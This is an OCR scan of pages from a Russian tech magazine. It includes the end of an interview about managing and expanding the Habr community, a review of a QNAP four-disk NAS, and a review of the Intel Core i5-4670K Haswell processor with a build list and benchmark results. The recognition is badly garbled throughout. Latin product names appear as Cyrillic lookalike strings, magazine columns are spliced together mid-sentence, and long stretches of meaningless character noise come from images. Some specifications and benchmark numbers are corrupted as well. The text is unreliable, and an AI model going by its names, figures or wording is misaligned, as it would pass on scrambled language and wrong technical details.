дня, из-за этого куча людей попадала в черные списки, и мы 
по две-три недели приходили в себя. 

Я довел Хабр до состояния, когда почувствовал, что по- 
рядок наведен и дальше нужно лишь сохранять выбранный 
курс, поддерживать его в стабильном виде. Тогда я пригласил 
Бумбурума, и этим стал заниматься он. 

Это действительно крутая история. Потому что я взял 
человека, который вырос внутри сообщества, стал там лиде- 
ром. Он уже знал все изнутри, ему не надо было ничего объяс- 
нять — он понимал, что и как нужно, и очень быстро включился 
в работу. В какой-то моментя даже немного расслабился и стал 
заниматься другими проектами. 

Сейчас Хабр не требует никакой жесткой, ежедневной 
работы. Мы уже практически не применяем никаких санкций, 
никого не баним, потому что все уже поняли, каковы правила. 
Нужно только поддерживать песочницу — это ключевая состав- 
ляющая, точка входа, через которую поступают новые люди. 
И если на текущий Хабр попадают только те люди, которые по- 
нимают, о чем он, то никаких проблем с ним не может быть во- 
обще. 

При этом у нас есть желание переделать Хабр, но мы 
пока не знаем, как правильно к этому подступиться. Дело 
в том, что на сайте есть несколько «болячек», которые нас рас- 
страивают. Скажем, большая и высокая шапка. Когда заходишь 
на Хабр, текст начинается практически на середине страницы. 
Это проблема. Это красивая и интересная конструкция, но про- 
странство используется неэффективно. 


ПОПЫТКА МАСШТАБИРОВАТЬСЯ № 1 

Изначально план инвесторов был таков — мы пытались 
клонировать Хабр на другие направления. На спортсменов, 
тусовщиков, автолюбителей. Но это не пошло. Во многом по- 
тому, что ошиблись мы. И во многом потому, что грянул кризис 
имы не сумели довести все это до конца. 

Гики — это люди, предрасположенные к тому, чтобы 
делиться друг с другом знаниями. Ни спортсменам, ни ав- 
толюбителям, ни тусовщикам это не интересно. Автолюбители 
еще более-менее подходят, но... Им интереснее другое, типа: 
«Я езжу на /оК$мадеп Со! и хочу общаться с чуваками, которые 
тоже ездят на Гольфах. И вот у нас будет междусобойчик, и мы 
будем тусоваться». Заставить разношерстных людей собраться 
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Я взял человека, 
который вырос 
внутри сообщества, 
стал там лидером. 
Он знал все изнутри. 
Я даже смог немного 
расслабиться 


вместе и сделать так, чтобы они (как гики) между собой обща- 
лись, сразу не получилось. 

Для нас «Автокадабра» все-таки хобби. У нас многие 
пользуются автотранспортом, и многие увлечены своими ма- 
шинами, скажем, знают все-все про клапаны и тому подобное. 
И хотя нам неоднократно предлагали ее выкупить, это наше 
хобби, мы решили ее оставить. Для нас это некая эксперимен- 
тальная площадка. Отдельные вещи, которые появились на Ха- 
бре, мы сначала обкатывали там. Аудитория там меньше и цена 
ошибки не так высока. 

Одной из таких фишек стала персонализация. Рань- 
ше Хабр состоял из главной страницы, куда все падало. 
И не важно было, нужно это тебе или нет. Одна из проблем, 
из-за которой нас штормило туда-сюда, заключалась в том, 
что у проекта выросла аудитория. Появились различные 
группы людей — одним интересно программирование, дру- 
гим бы про стартапы почитать, третьим нужно вообще все 
подряд. 

Сначала они стали друг с другом сталкиваться и выяс- 
нять отношения. Типа «задолбали стартаперы, Хабр не торт». 
А кого-то бесили посты про программирование. 

Потом каждый мне писал: «Денискин, ты убил Хабра- 
хабр!» Я спрашивал почему, а мне присылали ссылку на разбор 
алгоритма и говорили: «Что это за бред, я не могу это читать, 
я в этом ничего не понимаю, раньше было лучше!» И такое стало 
случаться регулярно. 

Наконец от происходящего я окончательно потерял 
способность нормально спать и бодрствовать. Я посове- 
товался с коллегами, и мы приняли соломоново решение. Мы 
решили децентрализовать Хабр, который до этого был завязан 
на главную страницу. 

Новая система позволяет самому настраивать свою 
ленту и читать то, что хочется. Если тебе что-то не нравится, 
пожалуйста, убери и не читай. 

Это, конечно же, тоже было воспринято в штыки. Было 
много постов, где хоронили Хабр. Вот только после этих изме- 
нений аудитория сайта удвоилась. 


ГИКИ — НАШЕВСЕ 

Вскоре появилась идея выстроить «экосистему гиков», 
в которой им было бы интересно и удобно вращаться. 
Для этого нужно было окружить Хабрахабр полезными проек- 
тами-спутниками. 


Первым стал «Тостер» — наша попытка = С запуском «Фрилансим» началась 


проводить конференции. Мы хотели, чтобы 
гики любили нас еще больше и пользовались 


и история Вгат$тогаде. Мы поняли, что есть 
большой спрос на то, чтобы человек мог 


всем набором сервисов и продуктов, которые На ике п нельзя удобным образом представить, что он умеет 


мы можем предоставить. Самоцели зарабаты- 


и накопил. Но не в каком-то Ипкеат-стиле. 


вать на этом не было. Конференции — не тот красиво показать Свои Чтобы несмотря на то, что ты рисуешь кар- 


бизнес, который будет приносить большие 


тинки, а я пишу код, мы могли бы показать 


деньги и при этом работать сам по себе. Там репозитории в СЕНиб и рассказать о том, что мы умеем. На карьер- 


сильна ежедневная рутина — организация виз, 


ных сайтах ты не сможешь красиво показать 


переговоров, питания и так далее. Но в итоге ИЛИ тексты. Поэто- свои репозитории в СИНиб или показать, 


мы поняли, что нормальных площадок в Рос- 


какие ты пишешь тексты. Но мы сделали это 


сии просто нет. Решили больше не связываться му МЫ решили сделать в Вгат{огаде. 


с конференциями, скорее, мы будем помогать 
другим их проводить. 
Вскоре мы реанимируем «Тостер» и на 


Вгат$огаде 


Сейчас там уже 50 тысяч человек, в ос- 
новном это разработчики. Мы и сами не- 
давно закрыли пару вакансий, просто найдя 


его базе запустим свой О&А сервис для раз- = людей в этом хаосе, проанализировав то, 
работчиков. Мы хотим сделать что-то вроде что они представили о себе. Конечно, дальше 


русского Зфаск ОмегЙо\м. Конечно, в своем пони- 
мании и в своей интерпретации. Сейчас мы уже 
активно тестируем этот продукт. 

Другим проектом стал «Хантим». Он стал абсолютно орга- 
ничным развитием раздела «Работа», который в какой-то момент 
оказался очень зажат внутри болышого Хабра и никак не разви- 
вался. Многие хотели бы опубликовать предложения о работе, 
но для этого нужно было проходить регистрацию, инвайты. 

Момент для запуска «Фрилансим» был выбран неслу- 
чайно. Егее-1апсе.ги как раз оказался в центре скандала, когда 
они решили выступать посредниками в любой сделке и читали 
переписку пользователей. Буквально за месяц мы с нуля сде- 
лали «Фрилансим». В своем стиле устроили глобальный хака- 
тон — каждый что-то делал, анализировал, программировал, 
писал. Сделали хорошо, но сейчас уже понимаем, что могли 
бы и лучше. Тем не менееу Егее-!апсе.ги около 30 тысяч актив- 
ных пользователей, у нас — 15. То есть половину аудитории мы 
у них уже отъели. 


нужно встречаться, проводить собеседова- 
ния, но именно поиск там позволил нам найти 
тех кандидатов, что нам требовались. 

Дополнительные сервисы Хабра мы постепенно выно- 
сим в отдельные проекты. Скорее всего, аналогичным обра- 
зом мы поступим и с разделом «События», где люди публикуют 
информацию о всяких конференциях и других тусовках. Не все 
могут это сделать, многим промоутерам и организаторам 
опять же нужна «виза» на Хабр. 

Отдельная команда разработчиков на ВиБу оп ВайП$ 
обеспечивает быструю разработку этих новых сервисных 
проектов. Хотя сам Хабр, где огромные нагрузки, написан 
на РНР. 

После всех пертурбаций мы сделали вывод: нам 
не нужно больше никуда лезть. Мы лучше окопаемся в том 
месте, где уже закрепились. Наша цель сейчас — доминиро- 
вать в своей нише, создавать и поддерживать сервисы для ги- 
ков, делать их счастливыми. Ну и себя, конечно же. 2= 


Извечный вопрос: что выбрать — сервер 


Ееггит 


собственноручной сборки или готовый МАЗ? и 


Много копий сломано на эту тему, и топики 
на форумах стабильно перешагивают сотню 
страниц. Признаться, и я долго был адептом 
олдскульных решений, но в последнее вре- 
мя удобство функционала из коробки побе- 
дило, и я стал присматриваться к МАЗ’ам. 


ХАРАКТЕРИСТИКИ 


Процессор: Магуе! 2,0 ГГц 
Оперативная память: 1 Гб 
(0043) 
Назй-память: 16 Мб 
Дисковое пространство: 4х 
2,5" или 3,5" НОО с интерфейсом 
ЗАТА | или ЗАТА || 
Слоты для НОВ: 4х слот 
с возможностью горячей замены 
Емкость хранилища: 16 Тб 
Сетевые интерфейсы: 2х 
В/-45 Гигабитный Ееге{ 
Индикаторы состояния: статус, 
ГАМ, е5АТА, ИЗВ, 4 х НОО 
05$В: 2 х ИЗВ 3.0 (сзади), 
2х 05В 2.0 (спереди: 1; сзади: 
1), еЗАТА: 2 х е5АТА (сзади) 
Кнопки: питание, резервное 
копирование, сброс 
ЖК-дисплей: монохромный 
дисплей для быстрой настройки 
и системных уведомлений 
Зуммер: системные 
предупреждения 
Операционная система: Ипих 
Масса: без жестких дисков 3,0 кг 
Уровень шума: 
. При простое: 35,6 дБ 
. В работе: 36,7 дБ (с четырьмя 
установленными дисками 
объемом 0,5 Тб) 


Энергопотребление: 

. В спящем режиме: 13 Вт 

. В работе: 26 Вт (с четырьмя 
установленными дисками 
объемом 0,5 Тб) 


Габариты: 177 х 180 х 235 мм 


@ РОМИЕК 


ногие (ия втом числе) долгое время были ярыми 
приверженцами Запдаюпе-сервера — широкие 
возможности настройки позволяли, вооружив- 
шись напильником, ЭЗН и парочкой бессонных 
ночей, собрать своего франкенштейна. Однако 
время идет, и рынок специально заточенных для этих целей 
устройств — МА$З’ов — меняется, и на сегодняшний день со- 
временные МАЗ`ы уже из коробки могут предложить тебе бога- 
тый функционал на все случаи жизни. Одно изтаких решений — 
четырехдисковый МАЗ Т$-421 от тайваньской компании ОМАР 


ЗНАКОМСТВО 

ОМАР Т$-421 — это классический четырехдисковый МА$ 
с возможностью горячей замены дисков. МАЗ поддерживает 
как 3,5-, так и 2,5-дюймовые НОО/$$О0-накопители. Макси- 
мально поддерживаемый объем — 16 Тб. 

На задней панели вертикально расположились два ги- 
габитных Ейетщ-интерфейса, три ЧУЗВ-порта (два УЗВ 3.0 
и один ЦЗВ 2.0) и пара еЗаа-разъемов. Расположение пор- 
тов достаточно удобное, кабели нисколько не мешают друг 
другу. Блок питания у Т$-421 внешний. 

На передней панели, кроме индикаторов и еще одного 
ОЗВ 2.0, есть небольшой монохромный дисплей для систем- 
ных уведомлений. Кстати, здесь же расположена кнопка бы- 
строго резервного копирования, что достаточно удобно. 


ВСЕДЕЛО В СОФТЕ 
Но то, что действительно выделяет этот МА$ из множества 
других, — это по-настоящему впечатляющий функционал. 


Трудно вообразить протокол или технологию, поддержки ко- 
торойу ТЗ-421 не было бы заявлено. Этот МАЗ комфортно чув- 
ствует себя в СЕЗ/ЗМВ (0Е$)-, АЕР- и МЕЗ-сетях, из коробки 
работает с ЕТР и \\МебОА\ и всегда доступен по НТТР/НТТР5, 
Тепе и $$Н. Для своих собственных дисков поддерживаются 
файловые системы ех3 и ех\щ, для внешних выбор больше — 
еще и МТРЕ$, РАТЗ2 и НЕЗ+. Есть возможность работы с сете- 
выми службами УРИР и Вопроиг, а при желании к МАЗ’у мож- 
но докупить внешний \\-Е1 802.11п УЗВ-адаптер и стримить 
фильмы и сериалы прямо на Т\ безо всяких проводов. 


- 


05В ебАТА 


Админка — предмет особой гордости разработчиков, 
мало где встретишь настолько простую и мощную систему 
управления сетевым хранилищем. Внешне все работает 
очень плавно, без тормозов, несмотря на обилие графики. 
По функционалу очень похожа на современные мобильные 
ОС, в частности тут есть свой собственный портал бесплат- 
ных приложений и контента в лучших традициях Рау! и Арр 
Зюге. А благодаря технологии туОМАРсоца есть возмож- 
ность получить удобный доступ к своему контенту и управлять 
им из любого места или устройства, будь то ноутбук, смарт 
или планшет. Кстати, для мобильных устройств под Апаго и 
05 есть целый набор приложений для обмена фотками, му- 
зыкой и другими файлами, а также для мониторинга системы 
и даже картинок с подключенных !Р-видеокамер. 


НИЧЕГО НЕ ПРОПАДЕТ 

К вопросу резервного копирования данных тайваньцы из 
ОМАР подошли не менее серьезно. Тут есть и репликация 
в реальном времени (ВТВВ), и репликация ресурсов на уров- 
не блоков. Кнопка копирования данных на передней панели 
позволит быстро закатать бэкап на любое поддерживаемое 
внешнее устройство. Отдельным пунктом стоит отметить 
возможность резервного копирования данных на облачные 
системы хранения данных: Соое Опуе, Атагоп $3, Зутюгт 
иЕерпатОгпуе. Для\М/тао\м$ существует специальное прило- 
жение МавВак Верйса{ог, а если ты пользователь ОЗ Х и при- 
вык работать с Тите Маспте, то Т$-421 без труда примет 6э- 
кап вее формате. 


ВЫВОДЫ 

ОМАР Т$-421 произвел впечатление очень продуманного 
и функционального девайса. Если раньше мне часто при- 
ходилось лазить в консоль, чтобы включить ту или иную оп- 
цию в конфигах, то теперь весь зоопарк необходимых мне 
сервисов поднимается и конфигурируется парой опций 
в админке. А доступ через туОМАРсюочца сильно облегчает 
жизнь, позволяя быть уверенным в том, что все мои данные 
будут всегда под рукой, экономя время и нервы. А это до- 
рогого стоит. = 


32 Ееггит 


ТЕСТИРОВАНИЕ ПРОЦЕССОРА 1МТЕЕ СОВЕ 15-46 70К 


Выход процессоров на базе новой архитектуры, будь то АМВ или \е|, — 
это всегда грандиозное событие! И мимо него мы пройти не можем. В на- 
чале июня {| наконец-то представила общественности «камни» на базе 
архитектуры Наз\ме!. К изучению новинки мы подошли основательно, 
разделив обзор Соге 15-4670К на три части. В этой статье ты сможешь уз- 
нать про основные новшества, которые преподносит нам Наз\мей. 


ОНЕЩЕ ДЕЙСТВУЕТ? 

Как всегда, во время знакомства с новой архитек- 
турой процессоров и\е! мы обращаемся к закону 
Гордона Мура и концепции «тик-так». Не обойдем 
стороной и Наз\мей. 

Согласно концепции «тик-так», | снача- 
ла выпускает процессор на новом техпроцес- 
се, но старой архитектуры («тик»), а затем, на- 
оборот, выпускает процессор на базе все того 
же техпроцесса, но с новой архитектурой («так»). 
Вырисовывается следующая цепочка: 3З2-на- 
нометровые «камни» архитектуры \Мезтеге — 
«тик-процессоры»; —32-нанометровые — Фапау 
Виаде — «так-процессоры»; 22-нанометровые М№у 
Виаде — опять «тик-процессоры»; наконец, 22-на- 
нометровые Назме! — «так-процессоры». 

Согласно закону Мура, количество транзисто- 
ров, размещаемых на кристалле СРУ, удваивает- 


ся каждые 24 месяца. Позже в 1! сделали не- 
большую поправку и уменьшили срок с двух лет 
до полутора. Итак, кристалл Запау Впаде имеет 
в своем распоряжении 995 миллионов транзи- 
сторов. В свою очередь, №у Впаде при полезной 
площади 160 мм? имеет 1400 миллионов кремни- 
евых затворов. Наконец, Назме! имеет площадь 
кристалла 177 мм? и 1600 миллионов транзисто- 
ров! 


ВРЕМЯ МЕНЯТЬ АРХИТЕКТУРУ 

Итак, согласно концепции «тик-так», все Назме! 
выполнены на базе 22-нанометрового техно- 
логического процесса. Технология травления 
кремния — та же (логично, ведь по болыному 
счету именно для этого в | и разрабатывают 
«тик-процессоры»). Это трехмерные транзисторы 
НИЕЕТ. 


ТНТЕЕ СОМЕТРЕМПАЕ | 
р. ОЕБУ ЕБ ЗОН и 
| ПАУ 


[2498428 ©) 
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ХАРАКТЕРИСТИКИ 


Кодовое имя: Назме! 
Техпроцесс: 22 нм 
Процессорное гнездо: [СА1150 
Число ядер (потоков): 4(4) 
Тактовая частота (Тифо Во0$1 2.0): 
3400 (3800) МГц 

Кеш 13: 6 Мб 

Контроллер памяти: ООВ 3- 
1333/1600 

Линии РС! Ехрге$$ 3.0: 16 
Встроенное видео: НО СгарНс$ 
4600 

ТОР: 84 Вт 


Никуда не делись встроенные контроллер 
памяти ООАЗ и 16 линий РЕ Ехргез$$ 3.0. Новые 
Назме! поддерживают до 32 Гб ОЗУ. Увеличи- 
лось число множителей памяти: от ООАЗ-1333 
до ООВЗ-3200. Линии РС! Ехргез$ традиционно 
могут делиться как пополам, так и согласно схеме 
х4 + х4 +х4 +х4. 

Других архитектурных изменений относи- 
тельно №у Впаде, что удивительно, не так много. 
А посему большая часть элементов «плюща» пе- 
рекочевала в Назме!. Однако на некоторые ново- 
введения, направленные на увеличение быстро- 
действия процессоров, стоит обратить внимание. 

Во-первых, Назме!Й получил несколько новых 
исполнительных устройств и два порта испол- 
нения с переходами и с сохранением адресов. 
На порты «повесили» дополнительные блоки ра- 
боты с целочисленными инструкциями. В итоге 
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кристалл получил сразу четыре целочисленных 
АГО, а сама архитектура стала более гибкой в ра- 
боте с ЕМА-инструкциями. В теории подобное 
решение должно увеличить производительность 
технологии Нуре!-ТПгеаато. 

Во-вторых, у Назме! реализована поддерж- 
ка новых инструкций А\Х2/ЕМАЗ, которая рас- 
ширяет и без того болышой набор 256-битных 
$МО-команд. Данные инструкции предназначены 
в первую очередь для высокопроизводительных 
вычислений. Однако профит от внедрения А\Х2/ 
ЕМАЗ стоит ждать лишь тогда, когда программи- 
сты начнут использовать их в своем коде. В таком 
случае производительность Назме! может быть 
увеличена на 30-50% в сравнении с Му Впадсбе. 
А это уже серьезный показатель! 

В-третьих, в Назме! улучшено предсказание 
переходов, которое позволит ускорить загрузку 
исполнительных портов. Увеличен размер 12 ТВ. 
Также в новых процессорах увеличен буфер вне- 
очередного исполнения, который отвечает за ско- 
рость трансляции адресов. 

Наконец, в-четвертых, кеш-память перво- 
го и второго уровней получила вдвое большую 
пропускную способность. Только вот задержки 
при этом остались прежними. Кеш 11 спосо- 
бен выполнять по два 32-байтных чтения и одну 
32-байтную запись за такт времени. Кеш 12 спо- 
собен считывать и записывать 64 байта данных 
за такт. Общий кеш 13 модификации не подвер- 
гнулся, как и кольцевая шина в целом. 

Не только у нас, но и у наших коллег возникли 
сомнения, правильно ли называть Назме! «так- 
процессором», ведь серьезных архитектурных 
изменений и модификаций нет так много. Отсюда 
неудивительно, что Назме! имеет такое крошеч- 
ное преимущество над №у Впадще. 


ЗНАКОМИМСЯ С ПРОЦЕССОРАМИ 
Но давай не будем торопить события. Теперь 
поговорим о самих моделях процессоров, вы- 
полненных на базе архитектуры Назме!. На дан- 
ный момент представлено свыше десяти «кам- 
ней», относящихся как к категории Соге 15, так 
и ккатегории Соге 17. Все — четырехъядерные, 
но Соге 17, как и положено, имеют поддержку 
технологии Нурег-ТИгеаато. К тому же Соге 17 
имеют увеличенный до 8 Мб кеш третьего уров- 
ня. Соге 15 приходится довольствоваться 6 Мб 
ЗВАМ 13. 

Двухъядерные процессоры Соге 13 пока 
не представлены. Возможно, часть из них будет 
упаковываться ВСА-пайкой. 


Соге луковое 


Второй момент — наличие приставок в назва- 
нии СРИУ. Самым быстрым Назме! является Соге 
[/-4770К. Литера «К» в названии говорит о том, 
что процессор имеет разблокированный множи- 
тель. По аналогии с «камнями» архитектуры Запау 
Виаде и №у Впаде в продаже есть просто Соге [7- 
4770, а также СРУ Соге 17-4770$/4770Т с умень- 
шенным до 65 Вт уровнем ТОР. 

С Соге 15 ситуация аналогичная. Прибывший 
кнам в тестовую лабораторию Соге 15-4670К функ- 
ционирует на частоте 3,4 ГГц, но благодаря техно- 
логии Тифо Вооз${ 2.0 скорость работы «камня» 
может быть увеличена до 3,8 ГГц. С учетом того, 
что процессор имеет разблокированный коэффи- 
циент умножения, это не столь важно. 


ВИДЕО — НАШЕ ВСЕ! 

Разговоры про НО Огартс$ 4600 ходят уже давно. 
Кодовое название интегрированного ОРУ — СТ2. 
Графика предлагает 20 исполнительных устройств 
(на четыре больше, нежели у НО Сгартс$ 4000), 
а также увеличение производительности блоков 
фиксированной функциональности, текстурных 
семплеров и технологии Ошск $упс. К тому же НО 
Огарбс$ 4600 обзавелся новыми версиями АР: 
Онесх 11.1, ОрепСЕ 1.2, ОрепСЕ 4.0. НО ОгарШс$ 
4000 может похвастать поддержкой ПОпесхХ 11.0, 
ОрепСЕ 1.1 и ОрепСЕ 3.3. 

По факту НО Сгарс$ 4600 на 20-30% бы- 
стрее НО Сгарпюс$ 4000. Однако встроенное 
видео Назме! все равно не ровня Вадеоп НО 
76600/86700, используемым в АРУ Типйу/ 
АсШТапа от АМО. 

Стоит отметить, что вскоре на рынке появят- 
ся системы (скорее всего, моноблоки и НТРС) 
на базе процессора Соге Г’-4770Н. Этот «ка- 
мень» не будет совместим с процессорным гнез- 
дом [@А1150, но будет упаковываться на плате 
при помощи ВСА-пайки. Этот Назме! получит 
графическое ядро СТЗе с 40 исполнительными 
устройствами и кеш-памятью четвертого уровня 
на основе Етредаеа ОВАМ. Также сам Соге 17- 
477ОВ получит всего 6 Мб кеш-памяти третьего 
уровня. 


МИНУС ПЯТЬ «НОГ», ПЛЮС СЕМЬ ВАТТ 

Важной особенностью процессоров Назмей яв- 
ляется наличие интегрированного регулятора 
напряжения. В каждом «камне» под теплораспре- 
делительной крышкой находится до двадцати яче- 
ек размером 2,8 мм»>, а в каждой ячейке — до 16 
виртуальных фаз. Сила тока может достигать вы- 
соких 25 А. С учетом общих 16 : 20 = 320 фаз появ- 


Конечно же, все ведущие сборщики персональных компьютеров уже предло- 
жили свои системы на базе процессоров Назме!. И если утебя возникло жела- 
ние самостоятельно собрать подобную систему, то рекомендуем приобрести 


следующие комплектующие: 
ще! Соге 15-4670К (8000 рублей) 


Трегтамоаот НВ-02 (1700 рублей) 
М$1 287-С065 САММОС (6500 рублей) 
Ктозюп КНХ21СЛ1ТЗК2/16Х (5000 рублей) 
МУ! @еРогсе СТХ 770 САММС (15 000 рублей) 
Режог РХ-128МБР (4500 рублей) 
Меет О!ока! М/О20ЕЙНХ (3000 рублей) 
ТрептаКаке Тоцапромег Сгапа 650 Вт (5000 рублей) 


Цап ИРС-7НВ (4000 рублей) 
52 700 рублей 
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СРИУ | Сабнез МатБоага Метогу РО сгарыс® | АБоцЕ 


Ргосеззог 
Мате юм Соге 5 4670К 


Соде Мате Назмией Мах ТОР | 84 
Раскаде Зоске{ 1150 (СА 
Тесппоюду | 22 пт 


(ие! тяде 
пень 5 
СОВЕ 15 


ЗресЯсавоп п4екВ) Соге(ТМ) 5-4670К СРУ @ 3.40СН2? (ЕЗ) 
Ратйу 6 Моде! С З4еррт9 3 
Ех Ратйу 6 Ех. Моде! ЗС Вемвюп Со 


пз!гисбопз | ММХ, 55Е, 55Е2, 55Е3, 555Е3, 55Е4.1, 55Е4.2, ЕМ6АТ, 
МТ-х, АЕБ, АМХ, АМХ2, ЕМАЗ 


Соге Мойаде 0.992 М 


Сюск$ (Соге #0) Саспе 
Соге Зреед 3399.87 МН: [1 баз | 4х32 КВИез 8-мау 
Мибрйег | х34.0 (8-42) 14 ЗЕ 4х 32 КВУез 8-мау 
100.00 МН; еуе!2 | 4х 256 КВУез 8-мау 
еуе! 3 6 МВУез 12-\мау 


Виз 5реед 


Зеесвоп |Ргосеззог #1 Согез | 4 Тпгеад$ | 4 


чье | 


\Мегзюп 1.64.0.х64 


Валидация процессора Соге 15-4670К наноминаль- 
ных частотах 


ляется возможность максимально точно дозиро- 
вать энергию определенных частей процессора. 
Чуть забегая вперед, отметим, что одновременно 
с процессором к нам на тест прибыла материн- 
ская плата АЗУ$ 787-ОЕЦОХЕ, которая, как и по- 
ложено, имеет свои цифровые стабилизаторы 
напряжения \Соге вкупе с шестнадцатью фазами 
питания. По большому счету теперь процессоры 
Назме! могут отказаться от подобных услуг Отма- 
теринки лишь требуется стабильная подача напря- 
жения в размере 1,8 В. 

Думаем, уже вместе с архитектурой Вгоадме! 
встроенный контроллер напряжения будет инте- 
грирован непосредственно в кристалл. 

Интегрированный преобразователь напряже- 
ния повлиял на общий уровень потребления энер- 
гии новых процессоров. Так, уровень ТОР Соге 15- 
4670К составляет 84 Вт, что на 7 Втвыше, нежели 
у Соге 15-3570К. Однако примечательно, что на ко- 
робке, в которой лежали сам процессор и кулер, 
было написано следующее: «15-4670К, 3.4 СНУ?, 
6МВ Саспе, 1@1150, 95. Однако! Максимальная 
допустимая температура Соге 15-4670К не должна 
превышать отметки 100 градусов по шкале Цель- 
сия. 

Второй момент. Скорее всего, именно в связи 
с интеграцией встроенного регулятора напряже- 
ния инженерам ще! пришлось использовать дру- 
гую «упаковку» — 1СА1150. Очевидно, что Назме! 


ТЕСТОВЫЙ СТЕНД 


Процессор: ме! Соге 15- 
467ОК, 3,4 ГГц 

Материнская плата: АЗИ$ 
787-Беихе 

Оперативная память: 

2х4 Гб, АОАТА ХР@ 0083-2133 
(10-11-11-30) 

Накопитель: Согзаи С5$0- 
Р128СВР-ВК, 128 Гб 

Блок питания: Соо!ег Ма$ег 
В$-850-5РНА-З, 850 Вт 

ОС: МИпдом$ 7 Умтае, 64 бит 


У 


Сергей Плотников 


34 


Ал АЛАЛА) 


ЕЕ ИЛИЯ 


и Е 


' ‚ера =. РЕ 5: ии: 
сна 1 8}: ЕН „еее 


— сана, > ув фене ЗИ 
а и, ее м ЕЕ 


Ш ивы и "и | } 


ии”. пенни, =: 
2а еее й 
= $ 


: —*#: 2» аи 
ме ПО === а ит 
ы & еымыы ВЕ  ЧЕЗЕ И Тм 
|= 1 } КЕ Обе 1 : 


— 525 
5“ с. —= 
ИЕ 


= ‘етезетией _ 
р 


НН и ча Па. 2м | ЗЕ2ЕЕ 
ПАТИ [и т 


Ргосе$$ог 
СгарР!с$ 


8 Г= 


ПИННИНИЕ 


| ППОПИЙН 


ХАКЕР 10 /177/ 2013 


Епдште & 
И Метогу 


т 2 
ВИ. в: =: Соптгойег 


ы 
и а 


Е # рее 


= 


- 
=. 


ИНИНННИ 
цинАнии 


пса 9 
ПН РИ: рСТе 


.2- 
вк ‚= 


Нави  ^ 


ЧН НИ ОИ 1 Е Е. - " ' 
Ч И тян пипииииии = = ми 
ОНИ ыы ши А ПН ВОС 
ь | ПОЕЗВЕЕ Е ИЕ 2, ий - 
пре |. й ИИ и: ВО И тины 
тт 1 29 сме | ПОООЕАСО иран , и 
рвы вяН а Ч чье ВИЗИТ ; | == | 
УМН "Ин м Е га ом 
м ‚= ИУ 1 
м И и з «ПЕ м ты енн НН }  вараши “чине ны НН  ииироччарчин: 
Ё К? к 3% Е! и Тшиниюны Е о. а ее ОЕ „— 
И х : еее О о ее еее еее 
, рии т ВБаБЛЕ к | 
а Ен |,” | а т НИ г НН м -. |. # т : 
а В Ш ин в | . 
ан и м 2 й = <“ } ре ИЖ и - = 
фл ты; [2% т с РН ий "р фа Ее ‚- 
-- ИХ | ПЕ в Мн-ь....М а - Е НЫ 
тот сы а ИИ ли. Ш ЕЕ Бе ТЕ: [т 
‚в „=. 2, Сы и М ОК Вос „ИВ и к м м Е Ё 
р ним а. я "ВВ $ | Ра а Г Г: Е 
К | рек. . Ма и - МО та ыы №" 
| ве в и: в Е ты Ей 2-м не 8 |- | 
:= | ! -- " и | Ра бу. : Е Е Ё 
и |] а 9 5: эк Е == 
Г ОМНИ ТВТ ВИ ПР Н НО С 1 т и } р м. -- ЕЕ = ЗЕ 
:. | мы ВЕ В Е Е Рун. ус 1 
| ИИ „№ $ | в | Но я Е =": "ы. = ын т ЗЕЕ ЕЕ ЕЕ. 
Е ин |ИЫЫЫН а | ее та ТЕ НН |. Е 
| ищи и ‚№ т ива: 1. НВА :] 
С МИ о и ПВ | о вы | еее -- Е | 
| С о и ое в о, Ш -- Е Е = Е . 
ее НЙ Тени а Е ь 
$ | О и Р Е | . Г и : 
Го [ ‘ва = Е = 18: | ы уж = Н 
ао ый тт ЕВА Е = Е || жж ж] ТЫ ыы "в е 
р: ЕЕ Я. в тв а Е [54% Е 
м Ч В-ы  9-% 
я 3 [ВЕС Е | 
еее |!!! ив = 5} за ыы Е РЕ == | 


Кристалл двухъядерного и четырехъядерного Назмей 


несовместим с [СА1155. Поэтому в любом случае 
придется брать плату на базе новых чипсетов 287/ 
Н87/087/В85 Ехргез$. Сплошные траты! Подроб- 
нее о логике 787/Н87 Ехрге$$ читай в обзоре мате- 
ринской платы АЗУ$ 287-ОЕЕОХЕ. 


ГОРЕ ЛУКОВОЕ 
В рамках статьи мы поговорили о новой архитек- 
туре Назме! и протестировали процессор Соге 
15-4670К. Однако с учетом того, что тенденции 
формирования моделей СРУ не изменились 
и Соге Г/-4770К — тот же четырехъядерник, толь- 
ко с Нурег-Тпгеаата, 8 Мб кеш-памяти третьего 
уровня, функционирующий на частоте 3,5 ГГц, 
можно судить и о нем. Повторимся, ряд десктоп- 
ных процессоров Ш\1е| логичен и понятен. Оче- 
видно, что болышим спросом будет пользоваться 
именно Соге 15-4670К, так как по большому счету 
отНурег-ТИгеаатоа хотя бы в тех же компьютерных 
играх толку нет. На номинальную тактовую частоту, 
уверены, матерый техноманьяк не смотрит — раз- 
гон решит все проблемы. 

Сравнивая Соге 15-4670К с Соге 15-3570К, мы 
видим печальную во многом ситуацию: прирост 


РЕЗУЛЬТАТЫ 
ТЕСТИРОВАНИЯ 


Зирег Р! 1.5Х$, 1т: 08,658 с 

Зирег Р! 1.5Х$, 32т: 7 мин 34,382 с 

мРите 1.55, 32т: 7,205 с 

мРите 1.55, 1024т: 221,973 с 

М/И пВАВ 4.2: 5631 Кб/с 

СМЕВЕМСН В11.5, СРУ, ОрепС(: 7,07 р{$, 30,7 
ЕР$ 

ЗОМакк \/атаде, а!/СРИ/СРИ: 6581 /5296 / 24 194 
балла 

ЗОМакк Сючца дае, а!/дгаргис$/рпуз!с$: 
6849/7916/4654 балла 

ЗОМакк [се 51огт, а!/дгарРис$/рпуз!с$: 

46 035/53 131/31 372 балла 

ЗОМакк Рге З1иКе, а!/дгарР!с$/рпуз!с$: 
844/933/6452 балла 

Неауеп 4.0, разс/ежтете: 566/125 баллов 
РагСту 3, 1280 х 1024, Высоко, № АА, № АЕ: 
15.3 РРо 


Сравнениеядра №уВпадце (сверху) с Наз\ме! (снизу). Найди десять отличий 


производительности в х8б-приложениях состав- 
ляет жалкие 5-10%. Думаем, что аналогичная кар- 
тина будет, если сравнить Соге Г7-4770К с Соге 17- 
З77ТОК. Да, НО СОгартс$ 4600 в среднем на 20-30% 
быстрее НО СгарМс$ 4000, но, во-первых, если мы 
говорим о десктопных процессорах, энтузиастам 
по большому счету от этого ни тепло, ни холод- 
но. Во-вторых, СЯТ2 все равно уступает решениям 
отАМО. 

А теперь предварительные итоги. Десктоп- 
ные Назме| — настоящий катализатор всего 
того, что сейчас происходит в \е|. После ухо- 
да Пола Отеллини (Рац $. Ое!т!) и назначения 
на пост СЕО Брайана Кржанича (Вйап Кгхатсп) 
стало ясно, что все силы компании будут бро- 
шены на развитие мобильных процессоров. За- 
